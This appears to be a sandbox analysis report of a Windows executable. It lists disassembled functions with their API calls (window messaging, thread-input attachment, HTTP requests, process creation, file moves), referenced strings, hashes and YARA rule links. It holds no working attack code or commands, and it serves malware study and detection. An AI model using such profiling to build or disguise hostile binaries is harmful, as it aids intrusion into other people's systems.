Opcode ID: 4191c000ab2add84a9674e21cd2c3395366dcba08a30f661b10348d03ac7ab3d
Instruction ID: 499da48eaf5a249f7477cb56a7088c90a83fd17a054da75330925a660cb1bc93
Opcode Fuzzy Hash: 4191c000ab2add84a9674e21cd2c3395366dcba08a30f661b10348d03ac7ab3d
Instruction Fuzzy Hash: 3F51BE316047119FDB10EF25DC59B6ABBE6EF48721F048929F996DB2A1DB70E804CB42

Function 0064B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0064B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0064B546
GetLastError.KERNEL32 ref: 0064B550
SetErrorMode.KERNEL32(00000000,READY), ref: 0064B5BD

Strings

UNKNOWN, xrefs: 0064B575
READONLY, xrefs: 0064B588
INVALID, xrefs: 0064B58F
READY, xrefs: 0064B596
NOTREADY, xrefs: 0064B57C

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: a7905155f4a6e24abbb9a8c43015e8d9b1d59e30f196eedb411691615a7bfd5a
Instruction ID: 24444abf9df6e4e801f8838936e3b04d754e858ed86b25590173e96aca075c61
Opcode Fuzzy Hash: a7905155f4a6e24abbb9a8c43015e8d9b1d59e30f196eedb411691615a7bfd5a
Instruction Fuzzy Hash: 53318175A0020ADFCB08EF68D885AEDBBB6FF49310F145125E505D7291DB71DA42CB51

Function 00638F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22

Part of subcall function 0063AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0063AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00639014
GetDlgCtrlID.USER32 ref: 0063901F
GetParent.USER32 ref: 0063903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 0063903E
GetDlgCtrlID.USER32(?), ref: 00639047
GetParent.USER32(?), ref: 00639063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00639066

Strings

ComboBox, xrefs: 00638F9C
ListBox, xrefs: 00638FD1

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: fb29ed171851fc3c9b820c9417ee24bbef54c13b2ad5947527e562964cf59042
Instruction ID: 8e434051696649b18817a841e8b916dd500029500d0fa63b069b7e1cdf765f2a
Opcode Fuzzy Hash: fb29ed171851fc3c9b820c9417ee24bbef54c13b2ad5947527e562964cf59042
Instruction Fuzzy Hash: D421B674A00109BBDF05ABA1CC89EFEBB7AEF49310F100119F961972B1DBB55815DA70

Function 0063907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005E7DE1: _memmove.LIBCMT ref: 005E7E22

Part of subcall function 0063AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0063AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 006390FD
GetDlgCtrlID.USER32 ref: 00639108
GetParent.USER32 ref: 00639124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00639127
GetDlgCtrlID.USER32(?), ref: 00639130
GetParent.USER32(?), ref: 0063914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 0063914F

Strings

ComboBox, xrefs: 00639087
ListBox, xrefs: 006390BC

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: f2cf3574435090dcbf4898ca485c056376d792a7404d53b9454e2f686383eca5
Instruction ID: 9a127d63f3109ec70ebf4ded3505182694f5ea8eadd8ff358354df7f70f5ca13
Opcode Fuzzy Hash: f2cf3574435090dcbf4898ca485c056376d792a7404d53b9454e2f686383eca5
Instruction Fuzzy Hash: 2821C575A00109BBDF05ABA5CC89EFEBB7AFF49300F104019F961972A2DBB55815DB70

Function 00639163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0063916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00639184
_wcscmp.LIBCMT ref: 00639196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00639211

Strings

largeicons, xrefs: 006391A5
SHELLDLL_DefView, xrefs: 00639190
smallicons, xrefs: 006391D9
list, xrefs: 006391F3
details, xrefs: 006391BF

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: f6ecfbf5cce42ced5da936c5734d078e74b4cae98abd3d0355ac019e1c650bdc
Instruction ID: b6dbc4c33deb248868e4a9a10de2c2167f11aa7dd9d1786ceebd71b6e8a61097
Opcode Fuzzy Hash: f6ecfbf5cce42ced5da936c5734d078e74b4cae98abd3d0355ac019e1c650bdc
Instruction Fuzzy Hash: 2B1123362D8707BAEB152624EC1ADA7379FDF01320F20002AF910E05E1EEE269115DE8

Function 00647990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00647A6C

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: b721bfd8cff0dd1d1b2627053d5f809858fa143d4eb654769305695d986e885f
Instruction ID: e32646786919a091c697db7b9bbff4c1796925981fec866453e7b39f9009e0d5
Opcode Fuzzy Hash: b721bfd8cff0dd1d1b2627053d5f809858fa143d4eb654769305695d986e885f
Instruction Fuzzy Hash: D1B19F7190821A9FDB00DFA4D885BBEB7F6FF09321F244429E941EB291D774E941CBA4

Function 006411CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 006411F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00640268,?,00000001), ref: 00641204
GetWindowThreadProcessId.USER32(00000000), ref: 0064120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00640268,?,00000001), ref: 0064121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0064122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00640268,?,00000001), ref: 00641245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00640268,?,00000001), ref: 00641257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00640268,?,00000001), ref: 0064129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00640268,?,00000001), ref: 006412B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00640268,?,00000001), ref: 006412BC

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: ac9fc350f42f54c1eab5821676a10aec299af46170c465d1c9a20db0eee7ed1a
Instruction ID: 4c35f815ff8b7f5ce6c1640d933983ecf42397744b4f19616d17e1e5d4ce4514
Opcode Fuzzy Hash: ac9fc350f42f54c1eab5821676a10aec299af46170c465d1c9a20db0eee7ed1a
Instruction Fuzzy Hash: 2E319C75600204BFDB20AF55FD88FAA77ABEB56311F155125F900CA2A0E7F4AEC08F61

Function 005EFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 005EFAA6
OleUninitialize.OLE32(?,00000000), ref: 005EFB45
UnregisterHotKey.USER32(?), ref: 005EFC9C
DestroyWindow.USER32(?), ref: 006245D6
FreeLibrary.KERNEL32(?), ref: 0062463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00624668

Strings

close all, xrefs: 005EFAA1

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 62882fd1fa545cf59f29bb50f0b84374b0217df73c40ea86120f5e052a30d1fc
Instruction ID: 2c53fca2e7f7591cbdbeb622a0dd86e7fde725f1acb9d680cf80a399964bbadd
Opcode Fuzzy Hash: 62882fd1fa545cf59f29bb50f0b84374b0217df73c40ea86120f5e052a30d1fc
Instruction Fuzzy Hash: 75A18F30701622CFCB2DEF15D598A69FB66BF45700F2042ADE84AAB261DF30AD16CF50

Function 00659113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00659167
VariantInit.OLEAUT32(?), ref: 00659238
VariantInit.OLEAUT32(?), ref: 00659339
VariantClear.OLEAUT32(?), ref: 00659343
VariantClear.OLEAUT32(?), ref: 006593A0

Strings

Null Object assignment in FOR..IN loop, xrefs: 006591C8, 006592F6, 006593AE
,,g, xrefs: 006591E5
Incorrect Object type in FOR..IN loop, xrefs: 0065931C

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,g$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-4066664511
Opcode ID: bd2252c1db28344edbb54b51abbee60b67fb1d49d3389dd8be734f9c43798276
Instruction ID: bc09864f6a58e38b584c0ee9885bd64212fb149ae3510b44a8467d91435714f5
Opcode Fuzzy Hash: bd2252c1db28344edbb54b51abbee60b67fb1d49d3389dd8be734f9c43798276
Instruction Fuzzy Hash: AA919E71A00219EBDF24CFA5CC48FEEBBBAEF45711F108159F915AB280D7709949CBA0

Function 0063A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0063A439), ref: 0063A377

Strings

REGEXPCLASS, xrefs: 0063A13C
INSTANCE, xrefs: 0063A285
CLASS, xrefs: 0063A0F6
CLASSNN, xrefs: 0063A119
TEXT, xrefs: 0063A2AE
NAME, xrefs: 0063A1A9

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: dba73fd4d84c002cdea72c89433e6710cb102ae18888a4a8ca8d8f130530d899
Instruction ID: a7282b114481159392367f04c7b76b0a19d0b728cbc8d841b38c79e8625b1b0f
Opcode Fuzzy Hash: dba73fd4d84c002cdea72c89433e6710cb102ae18888a4a8ca8d8f130530d899
Instruction Fuzzy Hash: 5A919630A04606AADF4CDFE0C445BEEFBBAFF04300F548119E499A7291DB316A59EBD5

Function 005E2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 005E2EAE

Part of subcall function 005E1DB3: GetClientRect.USER32(?,?), ref: 005E1DDC
Part of subcall function 005E1DB3: GetWindowRect.USER32(?,?), ref: 005E1E1D
Part of subcall function 005E1DB3: ScreenToClient.USER32(?,?), ref: 005E1E45

GetDC.USER32 ref: 0061CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0061CD45
SelectObject.GDI32(00000000,00000000), ref: 0061CD53
SelectObject.GDI32(00000000,00000000), ref: 0061CD68
ReleaseDC.USER32(?,00000000), ref: 0061CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0061CDFB

Strings

U, xrefs: 0061CCD0

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: e3a624dd57f07a0f4749cf9979552a7c6d8ddd2d8b6a0e40e6172592bcb508fb
Instruction ID: 5e00372c41a24fb33a78b6a51b234334327759d2c38509b479f5284825810efd
Opcode Fuzzy Hash: e3a624dd57f07a0f4749cf9979552a7c6d8ddd2d8b6a0e40e6172592bcb508fb
Instruction Fuzzy Hash: FB71A131900245DFCF259F64D884AFE7FBAFF49320F18426AED559A2A6C7319C81DB50

Function 00651A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00651A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00651A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00651ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00651AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00651AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00651B10
InternetCloseHandle.WININET(00000000), ref: 00651B57

Part of subcall function 00652483: GetLastError.KERNEL32(?,?,00651817,00000000,00000000,00000001), ref: 00652498
Part of subcall function 00652483: SetEvent.KERNEL32(?,?,00651817,00000000,00000000,00000001), ref: 006524AD

Strings

, xrefs: 00651B01

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 217ce46290cae20b14077adcda078e02ab1e2671f7848acbf6fee9cad2a863c7
Instruction ID: 2f0459a2cc7a434ca2da40851a926383d697e9e20b4192527ae65a106516fc4d
Opcode Fuzzy Hash: 217ce46290cae20b14077adcda078e02ab1e2671f7848acbf6fee9cad2a863c7
Instruction Fuzzy Hash: 2D4181B1501219BFEB128F50DC85FFB7BAEEF09355F00412AFD059A241E7B09E499BA4

Function 00658C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0066F910), ref: 00658D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0066F910), ref: 00658D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00658ED6
SysFreeString.OLEAUT32(?), ref: 00658F00

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: dba4fad118b42402557000a3cf20cf1aa771c7e4fdf1e94527b12ad2110ab6b0
Instruction ID: 6ba5c72f0d354c12e5d58ef2e29f14de2afcfab101a658e440b2b628c243219a
Opcode Fuzzy Hash: dba4fad118b42402557000a3cf20cf1aa771c7e4fdf1e94527b12ad2110ab6b0
Instruction Fuzzy Hash: 82F10A71A00109EFDB14DF94C888EEEB7BAFF49315F108558F905AB251DB71AE4ACB60

Function 0065F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0065F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0065F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0065F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0065F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0065F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0065FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0065FA7C
CloseHandle.KERNEL32(?), ref: 0065FAAB
CloseHandle.KERNEL32(?), ref: 0065FB22

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: a529655313c0cfeea119c8eb88a49243f365e3ffe6f551ccbbcb03e9a41a69b6
Instruction ID: c012638f25caa212f16aaa461ddea33942641a4d586880ce589d297624c801a2
Opcode Fuzzy Hash: a529655313c0cfeea119c8eb88a49243f365e3ffe6f551ccbbcb03e9a41a69b6
Instruction Fuzzy Hash: C4E1BE312043419FC714EF24D895BAABBE6BF89314F14896DF8899B3A2CB71DC45CB52

Function 00644CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0064466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00643697,?), ref: 0064468B

Part of subcall function 0064466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00643697,?), ref: 006446A4

Part of subcall function 00644A31: GetFileAttributesW.KERNEL32(?,0064370B), ref: 00644A32

lstrcmpiW.KERNEL32(?,?), ref: 00644D40
_wcscmp.LIBCMT ref: 00644D5A
MoveFileW.KERNEL32(?,?), ref: 00644D75

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: c6c77a96b2bb0105f1413414be3b7a157fa7979e26c2170a71e561f69d390c3b
Instruction ID: 67b7c3eb8b036d099b9e276a1fac9f3a73cecb8d9971713e281cdde7f38dec40
Opcode Fuzzy Hash: c6c77a96b2bb0105f1413414be3b7a157fa7979e26c2170a71e561f69d390c3b
Instruction Fuzzy Hash: 7A5187B24083859BC764DBA0DC85ADFB7EDAF85354F00092EF285D3191EF71A588C75A

Function 00668645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006686FF

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

Associated: 00000000.00000002.2152911154.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2152982367.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153027916.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2153052775.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e0000_C5JLkBS1CX.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 042781fbf3042bcccea21508b222548719a805092140e135294cf982d9c97dc2
Instruction ID: 86b819986c3f65e9dea09fdb040afc0194c2b545d03dc70e7ab3feeea983a54d
Opcode Fuzzy Hash: 042781fbf3042bcccea21508b222548719a805092140e135294cf982d9c97dc2
Instruction Fuzzy Hash: E8516D30500254BFEB249B39DC89FAD7BA6BB05720F604315FA55E72A1CBB1AD80DB51

Function 005E2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0061C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0061C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0061C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0061C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0061C370
DestroyIcon.USER32(00000000), ref: 0061C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0061C39C
DestroyIcon.USER32(?), ref: 0061C3AB

Part of subcall function 0066A4AF: DeleteObject.GDI32(00000000), ref: 0066A4E8

Memory Dump Source

Source File: 00000000.00000002.2152928203.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true

